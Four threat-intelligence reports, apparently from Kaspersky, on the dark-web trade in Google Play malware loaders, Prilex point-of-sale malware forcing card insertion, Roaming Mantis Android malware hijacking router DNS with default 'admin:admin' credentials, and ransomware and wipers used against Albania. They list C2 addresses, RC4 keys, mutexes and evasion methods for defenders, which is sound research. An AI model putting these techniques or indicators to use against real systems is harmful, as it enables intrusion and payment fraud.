In 2022, Kaspersky security solutions detected 1,661,743 malware or unwanted software installers, targeting mobile users. Although the most common way of distributing such installers is through third-party websites and dubious app stores, their authors every now and then manage to upload them to official stores, such as Google Play. These are usually policed vigorously, and apps are pre-moderated before being published; however, the authors of malicious and unwanted software employ a variety of tricks to bypass platform checks. For instance, they may upload a benign application, then update it with malicious or dubious code infecting both new users and those who have already installed the app. Malicious apps get removed from Google Play as soon as they are found, but sometimes after having been downloaded a number of times.

With many examples of malicious and unwanted apps on Google Play being discovered after complaints from users, we decided to take a look at what the supply and demand of such malware on the dark web looks like. It is especially important to analyze how this threat originates, because many cybercriminals work in teams, buying and selling Google Play accounts, malware, advertising services, and more. It’s a whole underground world with its own rules, market prices, and reputational institutions, an overview of which we present in this report.

Methodology

Using Kaspersky Digital Footprint Intelligence, we were able to collect examples of offers of Google Play threats for sale. Kaspersky Digital Footprint Intelligence allows discreet monitoring of pastebin sites and restricted underground online forums to discover compromised accounts and information leakages. The offers presented in this report were published between 2019 and 2023 and were collected from the nine most popular forums for the purchase and sale of goods and services related to malware and unwanted software.

Key findings

• The price of a loader able to deliver a malicious or unwanted app to Google Play ranges between $2,000 and $20,000.
• To keep their activities low-profile, a large percentage of attackers negotiate strictly through personal messages on forums and messengers, for example, in Telegram.
• The most popular application categories to hide malware and unwanted software include cryptocurrency trackers, financial apps, QR-code scanners and even dating apps.
• Cybercriminals accept three main kinds of payment: a percentage of the final profit, subscription or rent, and one-time payment.
• Cybercriminals offer to launch Google ads to attract more people to download malicious and unwanted apps. The cost of ads depends on the target country. Ads for users from the USA and Australia cost the most — up to about $1 (US).

Types of malicious services offered on the dark web

As on legitimate online marketplaces, there are also various offers on the dark web for customers with different needs and budgets. In the screenshot below, you can see an offer list, which gives an overview of the number of different goods and services that may be needed to target Google Play users. The author of the list calls the prices too high; however, they do not contradict the prices we’ve seen in other dark web offers. The main products that attackers buy are developers’ Google Play accounts that can be either hacked or registered by cybercriminals using stolen identities, as well as source code of various tools that help the buyer to upload their creations to Google Play. Also, such services as VPS (for $300), or Virtual Private Server, which the attackers use to control infected phones or to redirect user traffic, as well as web-based injections are offered. A web injection is malicious functionality that monitors the victim’s activity, and if they open a web page that is of interest to the cybercriminals, an injector replaces it with a malicious one. Such a feature is offered for $25–80 apiece.

A dark web service provider calls these prices too high, and indicates that they sell the same services cheaper

Let’s take a look at some specific programs and services that cybercriminals offer for sale.

Google Play loaders

In most of the offers we analyzed, attackers sell Google Play loaders, programs whose purpose is to inject malicious or unwanted code into a Google Play app. This app is then updated on Google Play, and the victim may download the malicious update onto their phone. Depending on what exactly was injected into the app, the user may obtain the final payload with the update or get a notification prompting them to enable installation of unknown apps and install it from an external source. In the latter case, until the user agrees to install the additional app, the notification does not disappear. After installing the app, the user is asked for permissions to access key data from the phone, such as Accessibility Services, camera, microphone, etc. The victim may not be able to use the original legitimate app until they give the permissions required to perform malicious activities. Once all the requested permissions are granted, the user is finally able to use the app’s legitimate features, but at the same moment their devices become infected.

To convince the buyer to purchase their loaders, cybercriminals sometimes offer to provide a video demonstration, as well as to send a demo version to the potential client. Among the loader features, their authors may highlight the user-friendly UI design, convenient control panel, victim country filter, support for the latest Android versions, and more. Cybercriminals may also supplement the trojanized app with functionality for detecting a debugger or sandbox environment. If a suspicious environment is detected, the loader may stop its operations, or notify the cybercriminal that it has likely been discovered by security investigators.

Google Play loaders are the most popular offer on the dark web among Google Play threats

Often loader authors specify the types of legitimate apps their loaders work with. Malware and unwanted software is frequently injected into cryptocurrency trackers, financial apps, QR-code scanners and even dating apps. Cybercriminals also highlight how many downloads the legitimate version of the target app has, which means how many potential victims can be infected by updating the app with malicious or unwanted code. Most frequently, sellers promise to inject code into an app with 5,000 downloads or more.

Cybercriminals sell a Google Play loader injecting code into a cryptocurrency tracker

Binding service

Another frequent offer on the dark web is binding services. In essence, these do exactly the same thing that Google Play loaders do — hide a malicious or unwanted APK file in a legitimate application. However, unlike a loader, which adapts the injected code to pass the security checks on Google Play, a binding service inserts malicious code into an app that is not necessarily suitable for the official Android marketplace. Often, malicious and unwanted apps created with a binding service are distributed through phishing texts, dubious websites with cracked games and software, and more.

As binding services have a lower successful installation rate than loaders, the two differ greatly in price: a loader can cost about $5,000, while a binding service usually costs about $50–$100 per file.

Seller’s description of a binding service

The advantages and features of binding services listed in sellers’ ads are often similar to those of loaders. Binders usually lack Google Play-related features, though.

Malware obfuscation

The purpose of malware obfuscation is to bypass security systems by complicating malicious code. In this case, the buyer pays either for processing a single application, or for a subscription, for example, once per month. The service provider may even offer discounts for the purchase of packages. For example, one of the sellers offers obfuscation of 50 files for $440, while the cost of processing only one file by the same provider is about $30.

Google Play threat obfuscation offer for $50 apiece

Installations

To increase the number of downloads of a malicious app, many attackers offer to purchase installations by increasing app traffic through Google ads. Unlike other dark web offers, this service is completely legitimate and is used to attract as many downloads of the application as possible, no matter if it is a still-legitimate application or an already poisoned one. Installation costs depend on the targeted country. The average price is $0.5, with offers ranging from $0.1 to $1. In the screenshot below, ads for users from the USA and Australia cost the most — $0.8.

Seller specifies the installation price for each country

Other services

Dark web sellers also offer to publish the malicious or unwanted app for the buyer. In this case, the buyer does not interact directly with Google Play, but can remotely receive the fruits of the app’s activity, for example, all victim data stolen by it.

Average prices and common rules of sale

Kaspersky experts analyzed the prices in dark web ads offering Google Play-related services, and found that fraudsters accept different payment methods. The services can be provided for a share of the final profit, rented, or sold for a one-time price. Some sellers also hold auctions of their goods: since the number of items sold is limited, they are not very likely to be discovered, so buyers may be willing to compete for them. For example, in one of the auctions we found, the bidding for a Google Play loader started at $1,500, the bid increment (step) was equal to $200, and the “blitz” — the instant purchase price — was $7,000.

Cybercriminals auction a Google Play loader

The offered blitz price is not the highest. Prices for loaders we observed on dark web forums range between $2,000 and $20,000, depending on the malware complexity, novelty and prevalence, as well as the additional functions. The average price for a loader is $6,975.

Example of average offer for a Google Play loader

However, if cybercriminals want to buy the loader source code, the price immediately rockets, reaching the upper limit of the price range.

Seller offers a Google Play loader source code for $20,000

As opposed to a loader, a Google Play developer account (either hacked or newly created by the cybercriminals) can be bought quite cheaply, for example, for $200, and sometimes even for as little as $60. The price depends on the account features, such as the number of already published apps, number of their downloads, etc.

User wants to buy a Google Play account with access to the developer’s email

In addition to the many offers for sale, we also found numerous messages on the dark web about wanting to buy a particular product or service for a certain price.

Cybercriminal looking for a new Google Play loader

User wants to buy a new loader because their developer “went on a binge”

How deals are made

Sellers on the dark web offer whole packages of different tools and services. To keep their activities low-profile, a large percentage of attackers negotiate strictly through private messages on dark web forums or personal messages on social networks and in messengers, for example in Telegram.

It may seem that service providers could easily deceive buyers, and make a profit from their apps themselves. Often this is the case. However, it is also common among dark web sellers to maintain their reputation, promise guarantees, or accept payment after the terms of the agreement have been fulfilled. To reduce risks when making deals, cybercriminals often resort to the services of disinterested intermediaries — escrow services or middlemen. An escrow may be a special service and supported by a shadow platform, or a third party disinterested in the results of the transaction. Note, however, that on the dark web nothing eliminates the risk of being scammed with 100% probability.

Conclusion and recommendations

We continuously monitor the mobile threat landscape to keep our users safe and informed of the most important developments. Not long ago, we published a report about the threats smartphone users faced in 2022. However, looking at the volume of supply and demand of such threats on the dark web, we can assume that the number of threats in the future will only grow — and become more complex and advanced.

To stay protected from mobile threats:

• Do not enable the installation of unknown apps. If some app urges you to do it, it is most likely infected. If it is possible, uninstall the app, and scan the device with an antivirus.
• Check the permissions of the apps that you use and think carefully before granting an app permissions it doesn’t need to perform its main functions, especially when it comes to high-risk permissions such as Accessibility Services. The only permission that a flashlight app needs is to use the flashlight.
• Use a reliable security solution that can help you to detect malicious apps and adware before they start misbehaving on your device.
• Update your operating system and important apps as soon as updates become available. To be sure that an app update is benign, enable automatic system scan in your security solution, or scan the device right after the updates are installed.

For organizations, it is necessary to protect their developer accounts with strong passwords and 2FA, as well as monitor the dark web to detect and mitigate credential leaks as early as possible.

To inquire about Kaspersky threat monitoring services for your organization, please contact us at dfi@kaspersky.com.

Prilex is a singular threat actor that has evolved from ATM-focused malware into unique modular PoS malware—actually, the most advanced PoS threat we have seen so far, as described in a previous article. Forget about those old memory scrapers seen in PoS attacks. Prilex goes beyond these, and it has evolved very differently. This is highly advanced malware adopting a unique cryptographic scheme, doing real-time patching in target software, forcing protocol downgrades, manipulating cryptograms, doing GHOST transactions and performing credit card fraud—even on cards protected with the so-called unhackable CHIP and PIN technology. And now, Prilex has gone even further.

A frequent question asked about this threat was whether Prilex was able to capture data coming from NFC-enabled credit cards. During a recent Incident Response for a customer hit by Prilex, we were able to uncover three new Prilex versions capable of blocking contactless payment transactions, which became very popular in the pandemic times.

This blog post covers the NFC-related capabilities of recent Prilex modifications.

Tap-to-pay

Contactless payment systems are composed of credit and debit cards, key fobs, smart cards, or other devices, including smartphones and other mobile devices that use radio-frequency identification (RFID) or near-field communication (NFC, implemented in Samsung Pay, Apple Pay, Google Pay, Fitbit Pay, or any bank mobile application that supports contactless) for making secure payments.

The embedded integrated circuit chip and antenna enable consumers to pay by waving their card, fob, or handheld device over a reader at a point-of-sale terminal. Contactless payments are made in close physical proximity, unlike other types of mobile payments that use broad-area cellular or WiFi networks and do not require close physical proximity.

Different ways of tap-to-pay, but only one technology: NFC

Here is how they work:

• To make a payment with a contactless credit card, the cardholder simply holds the card close to the contactless-enabled payment terminal (usually within a few inches).
• The terminal sends a radio frequency (RF) signal to the card, activating the RFID chip embedded in the card.
• The RFID chip in the card sends a unique identification number (ID) and transaction information to the terminal. The transaction data is non-reusable, so even if it is stolen by cybercriminals, they cannot steal the money by using that. Neither can they access the RFID chip to tamper with the data generation processes.
• The terminal sends the transaction information to the card issuer’s processing network for authorization.
• If the transaction is approved, the terminal usually displays a confirmation message, and the payment is processed.

The pandemic gave a boost to NFC payments

The size of the global market for contactless payments was estimated at $34.55 billion in 2021 and is expected to continue growing at a compound rate of 19.1% from 2022 to 2030 annually, according to GrandView Research. The market was dominated by the retail segment, which accounted for more than 59.0% of global contactless revenue in 2021. Recent years saw an increase in the number of retail tap-and-go transactions: retailers can clearly see the benefits of contactless payments, which reduce transaction time, increase revenue, and improve operational efficiency. As stated in a Mastercard global study covering the year 2020, 74.0% of retailers expressed the intention to continue using contactless payments beyond the pandemic.

According to the US Payments Forum, Visa reports that in the U.S., tap-to-pay accounts for 28% of all face-to-face transactions, five times the pre-pandemic levels, while Mastercard says that 82% of card-present transactions in the country are happening at contactless-enabled locations. In Australia, contactless payments were growing in popularity even before the pandemic, with four out of five point-of-sale purchases being contactless in 2019. In the coming years, the popularity of this payment method is expected to grow even more everywhere in the world.

Contactless credit cards offer a convenient and secure way to make payments without the need to physically insert or swipe the card. But what happens if a threat can disable these payments in the EFT software running in the computer and force you to insert the card in the PINpad reader?

Insert-to-get-robbed

We have observed three new Prilex versions in the wild and managed to obtain the latest one (version 06.03.8080). The two others are 06.03.8070 and 06.03.8072.

The obtained version was discovered as recently as November 2022 and appears to originate from a different codebase than the others we found at the beginning of that year. Prilex now implements a rule-based file that specifies whether or not to capture credit card information and an option to block NFC-based transactions.

Excerpt from a Prilex rules file referencing NFC blocking

This is due to the fact that NFC-based transactions often generate a unique ID or card number valid for only one transaction. If Prilex detects an NFC-based transaction and blocks it, the EFT software will program the PIN pad to show the following message:

Prilex fake error displayed on the PIN pad reader that says, “Contactless error, insert your card”

Of course, the goal here is to force the victim to use their physical card by inserting it into the PIN pad reader, so the malware will be able to capture the data coming from the transaction by using all the techniques described in our previous publication, such as manipulating cryptograms and performing a GHOST attack. Another interesting new feature added in the latest Prilex samples is the possibility to filter credit cards according to segment and create different rules for each segment. For example, these rules can block NFC and capture card data only if the card is a Black/Infinite, Corporate or another tier with a high transaction limit, which is much more attractive than standard credit cards with a low balance/limit.

Malware adapting to the latest trends

With contactless cards growing in numbers and adoption increasing all over the world, the number of payments using this method has increased significantly and is expected to grow further in the years to come. Since transaction data generated during a contactless payment are useless from a cybercriminal’s perspective, it is understandable that Prilex needs to force victims to insert the card into the infected PoS terminal. While the group is looking for a way to commit fraud with unique credit card numbers, this clever trick allows it to continue operating.

The Prilex family is detected by all Kaspersky products as HEUR:Trojan.Win32.Prilex and HEUR:Trojan.Win64.Prilex. More detailed analysis on the latest Prilex versions and a full analysis are available to customers of our private Threat Intelligence Reports. For any requests on this topic, please contact crimewareintel@kaspersky.com.

Roaming Mantis (a.k.a Shaoye) is well-known as a long-term cyberattack campaign that uses malicious Android package (APK) files to control infected Android devices and steal device information; it also uses phishing pages to steal user credentials, with a strong financial motivation.

Kaspersky has been investigating the actor’s activity throughout 2022, and we observed a DNS changer function used for getting into Wi-Fi routers and undertaking DNS hijacking. This was newly implemented in the known Android malware Wroba.o/Agent.eq (a.k.a Moqhao, XLoader), which was the main malware used in this campaign.

DNS changer via malicious mobile app

Back in 2018, Kaspersky first saw Roaming Mantis activities targeting the Asian region, including Japan, South Korea and Taiwan. At that time, the criminals compromised Wi-Fi routers for use in DNS hijacking, which is a very effective technique. It was identified as a serious issue in both Japan and South Korea. Through rogue DNS servers, all users accessing a compromised router were redirected to a malicious landing page. From mid-2019 until 2022, the criminals mainly used smishing instead of DNS hijacking to deliver a malicious URL as their landing page. The landing page identified the user’s device platform to provide malicious APK files for Android or redirect to phishing pages for iOS.

Infection flow with DNS hijacking

In September 2022, we carried out a deep analysis of Wroba.o (MD5 f9e43cc73f040438243183e1faf46581) and discovered the DNS changer was implemented to target specific Wi-Fi routers. It obtains the default gateway IP address as the connected Wi-Fi router IP, and checks the device model from the router’s admin web interface.

Code for checking Wi-Fi router model

The following strings are hardcoded for checking the Wi-Fi router model:

From these hardcoded strings, we saw that the DNS changer functionality was implemented to target Wi-Fi routers located in South Korea: the targeted models have been used mainly in South Korea.

Next, the DNS changer connects to the hardcoded vk.com account “id728588947” to get the next destination, which is “107.148.162[.]237:26333/sever.ini”. The “sever.ini” (note the misspelling of server) dynamically provided the criminal’s current rogue DNS IP addresses.

Rogue DNS from a vk.com hardcoded account to compromise the DNS setting

Checking the code of the DNS changer, it seems to be using a default admin ID and password such as “admin:admin”. Finally, the DNS changer generates a URL query with the rogue DNS IPs to compromise the DNS settings of the Wi-Fi router, depending on the model, as follows.

Hardcoded default ID and password to compromise DNS settings using the URL query

We believe that the discovery of this new DNS changer implementation is very important in terms of security. The attacker can use it to manage all communications from devices using a compromised Wi-Fi router with the rogue DNS settings. For instance, the attacker can redirect to malicious hosts and interfere with security product updates. In 2016, details of another Android DNS changer were published, demonstrating why DNS hijacking is critical.

Users connect infected Android devices to free/public Wi-Fi in such places as cafes, bars, libraries, hotels, shopping malls and airports. When connected to a targeted Wi-Fi model with vulnerable settings, the Android malware will compromise the router and affect other devices as well. As a result, it is capable of spreading widely in the targeted regions.

Investigation of landing page statistics

As we mentioned above, the main target regions of the DNS changer were mainly South Korea. However, the attackers not only targeted South Korea but also France, Japan, Germany, the United States, Taiwan, Turkey and other regions. Smishing has been observed to be the main initial infection method in these regions, except South Korea, though we should keep in mind that the criminals may update the DNS changer function to target Wi-Fi routers in those regions in the near future.

In December 2022, we confirmed some landing pages and got an understanding of the number of downloaded APK files. Below are some examples of the download URLs from the landing page statistics.

The number of downloaded APK files was reset at the beginning of December 2022. After a few days, we got the above numbers from the landing pages, and it showed us that Android malware was still being actively downloaded for some targeted regions. It also showed us that the most affected region was Japan, followed by Austria and France. From this investigation, we noted that the criminals have now also added Austria and Malaysia to their main target regions.

According to the download URLs for each region above, with the exception of South Korea, it seems that the criminals randomly generated and registered these domains to resolve the IP addresses of the landing page. It seems pretty obvious these domains were used as a link in the smishing for the initial infection. Regarding South Korea, the URLs have a legitimate domain because of DNS hijacking. Resolving the legitimate domain for “m.xxx.zzz” (for mobile) and “www.xxx.zzz” with rogue DNS and legitimate DNS yields the following results, respectively:

As you can see, their rogue DNS only works in the mobile domain, which is “m.xxx.zzz”. We believe the criminals only filtered a limited number of domains that can be resolved to their landing page to hide their activity from security researchers.

Geography based on KSN

Our telemetry showed the detection rate of Wroba.o (Trojan-Dropper.AndroidOS.Wroba.o) for each region such as France (54.4%), Japan (12.1%) and the United States (10.1%). When compared with the landing page statistics above, the results are similar in that many detections have been observed in France, Japan, Austria and Germany. On the other hand, while we had previously monitored landing pages for the United States, this time we haven’t seen those landing pages.

Conclusions

From 2019 to 2022, Kaspersky observed that the Roaming Mantis campaign mainly used smishing to deliver a malicious URL to their landing page. In September 2022, we analyzed the new Wroba.o Android malware and discovered a DNS changer function that was implemented to target specific Wi-Fi routers used mainly in South Korea. Users with infected Android devices that connect to free or public Wi-Fi networks may spread the malware to other devices on the network if the Wi-Fi network they are connected to is vulnerable. Kaspersky experts are concerned about the potential for the DNS changer to be used to target other regions and cause significant issues. Kaspersky products detect this Android malware as HEUR:Trojan-Dropper.AndroidOS.Wroba.o or HEUR:Trojan-Dropper.AndroidOS.Agent.eq, providing protection from this cyberthreat to Kaspersky’s customers and users.

IoCs

MD5 of Wroba.o
2036450427a6f4c39cd33712aa46d609
8efae5be6e52a07ee1c252b9a749d59f
95a9a26a95a4ae84161e7a4e9914998c
ab79c661dd17aa62e8acc77547f7bd93
d27b116b21280f5ccc0907717f2fd596
f9e43cc73f040438243183e1faf46581

Domains of landing pages:
1hy5.cwdqh[.]com
3.wubmh[.]com
3y.tmztp[.]com
53th.xgunq[.]com
5c2d.zgngu[.]com
5.hmrgt[.]com
8.ondqp[.]com
9v.tbeew[.]com
d.vbmtu[.]com
g.dguit[.]com
j.vbrui[.]com
k.uvqyo[.]com
kwdd.cehsg[.]com
mh.mgtnv[.]com
o.wgvpd[.]com
r48.bgxbm[.]com
t9o.qcupn[.]com
vj.nrgsd[.]com
w3.puvmw[.]com
xtc9.rvnbg[.]com
y.vpyhc[.]com

IPs of landing pages:
103.80.134[.]40
103.80.134[.]41
103.80.134[.]42
103.80.134[.]48
103.80.134[.]49
103.80.134[.]50
103.80.134[.]51
103.80.134[.]52
103.80.134[.]53
103.80.134[.]54
134.122.137[.]14
134.122.137[.]15
134.122.137[.]16
199.167.138[.]36
199.167.138[.]38
199.167.138[.]39
199.167.138[.]40
199.167.138[.]41
199.167.138[.]43
199.167.138[.]44
199.167.138[.]45
199.167.138[.]48
199.167.138[.]49
199.167.138[.]51
199.167.138[.]52
27.124.36[.]32
27.124.36[.]34
27.124.36[.]52
27.124.39[.]241
27.124.39[.]242
27.124.39[.]243
91.204.227[.]131
91.204.227[.]132
91.204.227[.]144
91.204.227[.]145
91.204.227[.]146

Rogue DNS:
193.239.154[.]15
193.239.154[.]16
193.239.154[.]17
193.239.154[.]18
193.239.154[.]22

Hardcoded malicious accounts of vk.com to obtain live rogue DNS servers:
id728588947

Providing live rogue DNS servers:
107.148.162[.]237:26333/sever.ini

Suspicious accounts/pages of some legitimate services for obtaining C2s
http://m.vk[.]com/id668999378?act=info
http://m.vk[.]com/id669000526?act=info
http://m.vk[.]com/id669000956?act=info
http://m.vk[.]com/id674309800?act=info
http://m.vk[.]com/id674310752?act=info
http://m.vk[.]com/id730148259?act=info
http://m.vk[.]com/id730149630?act=info
http://m.vk[.]com/id761343811?act=info
http://m.vk[.]com/id761345428?act=info
http://m.vk[.]com/id761346006?act=info
https://www.youtube[.]com/channel/UCP5sKzxDLR5yhO1IB4EqeEg/about
https://docs.google[.]com/document/d/1s0n64k12_r9MglT5m9lr63M5F3e-xRyaMeYP7rdOTrA/mobilebasic
https://docs.google[.]com/document/d/1IIB6hhf_BB1DaxzC1aNfLEG1K97LsPsN55AT5pFWYKo/mobilebasic

C&C
91.204.227[.]32
91.204.227[.]33
92.204.255[.]173
91.204.227[.]39
118.160.36[.]14
198.144.149[.]131

Introduction

On July 17, 2022, Albanian news outlets reported a massive cyberattack that affected Albanian government e-services. A few weeks later, it was revealed that the cyberattacks were part of a coordinated effort likely intended to cripple the country’s computer systems. On September 10, 2022, Albanian local news reported a second wave of cyberattacks targeting Albania’s TIMS, ADAM and MEMEX systems – the latter two systems critical for law enforcement – reportedly using the same attack type and by the same actors.

Around the same time, we identified ransomware and wiper malware samples resembling those used in the first wave, though with a few interesting modifications that likely allowed evasion of security controls and better attack speeds. Chief among those changes are the embedding of a raw disk driver, providing direct hard disk access inside the malware itself, modified metadata, and the use of Nvidia’s leaked code signing certificate to sign the malware.

So, what’s new in this blogpost?

• We compare the first and second waves of ransomware and wiper malware used to target Albanian entities and detail connections with previously known ROADSWEEP ransomware and ZEROCLEARE variants.
• The threat actors used certificates from Nvidia and Kuwait Telecommunications Company to sign their malware; the former was already leaked, but we’re not sure how they got their hands on the latter.
• We identified potential cooperation between different attack groups speaking different languages, and the possible use of AnyDesk as an initial entry point to start the ransomware/wiper infections.
• The changes implemented to automate and speed up wiping in the second wave of attacks are reminiscent of the notorious Shamoon wiper attacks in the Middle East.

Wiper and ransomware, comparing wave 1 and wave 2

Below, we compare and discuss the differences between the wave 1 and wave 2 ransomware and wiper malware.

Initial Infection – traces of cooperation between different attack groups and use of AnyDesk utility

Although we weren’t able to identify the initial entry point of the threat actor in the analyzed intrusion, a few days after the second wave wiping activities, we noticed underground chatter about someone having access to an AnyDesk account at another non-governmental but significant Albanian entity, and suggestions for Persian-speaking hackers to use it for deploying ransomware or wiper malware. This may increase the likelihood that the initial entry point for wave 2 is through legitimate remote access software such as AnyDesk, especially since we know that the wave 2 wiper modifications included automatic execution upon driver installation only – potential need for urgency due to the limited time/access window. The attackers and access provider seemed to belong to different attack groups and spoke different languages.

The ransomware – use of Kuwait Telecommunications Company signing certificate

This second wave sample has the same signing certificate parameters as the first wave sample, which is related to Kuwait Telecommunications Company. It’s unclear how the threat actor was able to sign its malware using Kuwait Telecommunications Company’s certificate, but we suspect it was stolen. As of the date of this publication, the certificate is no longer valid and has been revoked.

After the initial execution, the wave 2 ransomware checks for any six arguments (or more) supplied by the threat actor, as opposed to the wave 1 sample that checks for five arguments or more – a small modification that assists in defense evasion. Nevertheless, the intrusion analysis conducted on one of the affected machines indicates that in wave 2 the threat actor did not use a BAT file to invoke the ransomware while supplying seven digits similar to wave 1, but instead invoked the wave 2 ransomware immediately from the command line using six zeroes: “000000”. If ransomware execution fails because the correct arguments are not supplied, the wave 2 sample displays a different message from that of wave 1; the wave 2 message resembles an error message displayed by a PDF to DOC converter.

The wave 2 ransomware sample continues execution and checks for the mutex Screenlimitsdevices#77!;, a value that differs from the wave 1 sample’s mutex:
abcdefghijklmnoklmnopqrstuvwxyz01234567890abcdefghijklmnopqrstuvwxyz01234567890

Although we call this malware ransomware based on its behavior, the encrypted files are, in fact, unrecoverable. When comparing wave 2 ransomware samples to wave 1, we notice that both have the same , and both use CreateFile and WriteFile APIs to overwrite files. During the process of execution, wave 2 ransomware attempts to decrypt and execute embedded scripts, malware settings or API function names. The encryption algorithm used is RC4 in both wave 1 and wave 2. However, the RC4 key for decryption in wave 2 has been changed in another attempt to evade detection.

• Wave 1 RC4 key: 8C E4 B1 6B 22 B5 88 94 AA 86 C4 21 E8 75 9D F3
• Wave 2 RC4 key: F0 B4 ED D9 43 F5 C8 43 C9 D0 A2 4F 22 9B BC 3A

It’s worth noting that in both waves, the RC4 decryption method uses CryptoAPI (CryptDecrypt) instead of the usual substitution box method. The intrusion we analyzed in wave 2 indicates that the ransomware was probably deployed over the internal network, possibly from another compromised machine. This is reinforced by the fact that we didn’t see anything else dropped or executed before the ransomware execution, and the ransomware executable name was randomly generated, potentially by the tool the threat actor used to deploy it over the network (e.g., Mellona.exe).

Despite all the changes made in the wave 2 ransomware, the ransom notes remained the same and included political messaging that reflects the geopolitical tensions between Albania and Iran.

Ransom note in both wave 1 and wave 2 ransomware

The wiper – use of Nvidia signing certificate

Similar to the wave 2 ransomware sample, the threat actor made several modifications to the wave 2 wiper malware, probably to evade detection. The three main changes are:

• Modified malware signing
• Embedding of EldoS RawDisk driver inside the wiper malware
• Automatic wiping after driver installation command

Historically, in ZEROCLEARE and DUSTMAN incidents from 2019, the wiper malware and raw disk drivers were not signed and therefore could not directly access the raw disk for speedy data wiping. So, the wipers had to use a third-party loader such as TDL – a signed loader for unsigned drivers – to install the unsigned raw disk driver that allows the wiper malware to directly access the raw disk for wiping data using DeviceControl API methods. However, in the first attack wave targeting Albania, the threat actor signed the wave 1 wiper using the Kuwait Telecommunications Company certificate, thus removing the need for a third-party loader. The speed and automation improvements remind us of previous Shamoon operations in the Middle East.

Since the wave 1 wipers were exposed in July 2022, and likely to avoid static detections, the threat actor used Nvidia’s leaked signing certificate to sign the wave 2 wiper in September 2022, again eliminating the need for a third-party loader for the raw disk driver.

In wave 1, the wiper malware expected to find the raw disk driver in the execution directory or in the system directory. The driver wasn’t dropped by the wiper, and the threat actor likely dropped it using other means. Conversely, in wave 2 the threat actor embedded the signed raw disk driver in the wiper executable, dropped it and then installed it. In addition, the driver being used by the threat actor in wave 2 seems to copy metadata and a few functions from Microsoft’s diskdump.sys crash dump driver^[1] (version 10.0.19041.1682) as another means to avoid detections. The wiping activity starts automatically after the driver installation command; as opposed to the wave 1 wiper, where installation is one step and wiping execution is a second step.

Finally, for the most part, wave 1 and wave 2 wipers remained the same, including the reliance on the same authentication key to access the raw disk driver, and the use of the same DeviceControl API methods, but with one exception, as shown below. It’s worth noting that the method IOCTL_DISK_GET_LENGTH_INFO is exclusive to all Persian-speaking APT wipers.

• Wave 1 wiper DeviceControl API methods:
  • IOCTL_DISK_GET_DRIVE_GEOMETRY_EX
  • IOCTL_DISK_GET_DRIVE_GEOMETRY
  • IOCTL_DISK_GET_LENGTH_INFO
• Wave 2 wiper DeviceControl API methods:
  • IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS (new method in wave 2; used in multiple instances)
  • IOCTL_DISK_GET_DRIVE_GEOMETRY
  • IOCTL_DISK_GET_LENGTH_INFO

Based on our telemetry, we suspect the infections are associated with law enforcement institutions in Albania. This targeting is consistent with the previous wave of cyberattacks affecting the Albanian government during the July 2022 wave of cyberattacks.

Conclusions

In this publication, we discussed the changes made to the second wave of ransomware and wiper samples that targeted Albanian institutions to evade detection and inflict maximum damage.

Aside from the changes made to evade detection in wave 2, we suspect that the threat actors needed an automated and speedy wiper execution. In wave 2, the raw disk driver was embedded inside the malware and the wiping routine started immediately after driver installation, as opposed to the wave 1 procedure. This is reminiscent of Shamoon operations in the Middle East.

Finally, for defenders we can highlight two important elements from the intrusion and malware analysis presented here:

• Monitor for remote software activities such as AnyDesk for unauthorized use
• Always hunt and monitor for expired and/or leaked signing certificates as they can be used by threat actors to load and execute malware

Threat detection

The detection logic has been improved in all our solutions to ensure that our customers remain protected. We continue to investigate this threat using our Threat Intelligence and we will add additional detection logic once they are available.

Our products protect against this threat and detect it with the following names:

• HEUR:Trojan-Ransom.Win32.Agent.gen
• Trojan-Ransom.Win32.Gen.aghh
• Trojan-Ransom.Win64.Agent.dpf
• Trojan.Win32.Agentb.kzkj

Indicators of compromise

File hashes (malicious documents, Trojans, emails, decoys)

Ransomware

Wiper

Driver

Signing certificates serial numbers

^[1] Original, legitimate driver’s MD5 is 015caeec9148194054b5b1de64762a43